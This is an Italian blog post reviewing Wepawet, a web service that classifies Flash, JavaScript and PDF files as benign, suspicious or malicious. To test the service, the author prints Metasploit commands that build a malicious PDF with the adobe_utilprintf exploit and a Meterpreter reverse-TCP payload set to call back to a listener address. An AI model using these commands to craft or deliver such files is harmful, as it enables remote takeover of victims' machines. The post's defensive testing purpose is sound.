VoIP and Hacking

Wepawet: un servizio per la analisi del malware

by admin on Feb.03, 2010, under Sicurezza

Wepawet (che sta per Web Engine to Protect from and Analyze Widespread and Emerging Threats) è un servizio progettato e sviluppato dal Computer Security Group del Dipartimento di Computer Science alla University of California di Santa Barbara (UCSB), e destinato alla rilevazione e alla analisi di malware distribuito attraverso il web.
Il servizio offre la possibilità di effettuare l’ upload di un file o di indicare una URL che punti ad un file, da esaminarsi alla ricerca di codice malevolo, limitatamente comunque a files Flash, JavaScript, e PDF .
Si tratta in pratica di un insieme di tools che fanno uso di tecniche statiche e dinamiche per analizzare contenuti web ed identificare possibili comportamenti maliziosi.
Un file (o URL), dopo essere stato analizzato, può venire classificato in tre modi: benigno, sospetto, oppure malizioso. Malizioso significa che contiene codice anomalo e che tenta di eseguire uno o più exploits conosciuti. Viene invece definito Sospetto se il suo codice o il suo comportamento è anomalo, ma non può venire identificato come noto. Exploits 0-day o anche vecchi, ma per i quali il servizio non dispone di una “signature” possono pertanto essere classificati come sospetti.

Dato che Metasploit ha la possibilità di generare files PDF maliziosi e destinati ad essere distribuiti come contenuti web o allegati di posta elettronica, ho voluto sottoporne uno all’esame di wepawet:

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.222
LHOST => 192.168.1.222
msf exploit(adobe_utilprintf) > exploit

[*] Started reverse handler on port 4444
[*] Creating ‘msf.pdf’ file…
[*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >

Trascorso circa un minuto dal caricamento del file, l’esito è stato il seguente:

wepawet

L’exploit non è stato riconosciuto, tuttavia il file è stato almeno classificato come sospetto.

Per concludere, un servizio come wepawet può rappresentare uno strumento prezioso per gli utenti di Internet, specialmente ora che le minaccie informatiche presentano una tendenza crescente a una tipologia client-side, ma non va comunque inteso come infallibile.

Send post as PDF to PDF | PDF Creator | PDF Converter
:, , , , , , ,

Comments are closed.

Cerchi qualcosa in particolare?

Usa il form qui sotto per cercare nel sito:

Blogroll!

Alcuni links...

Archives

Tutte le entries, in ordine cronologio...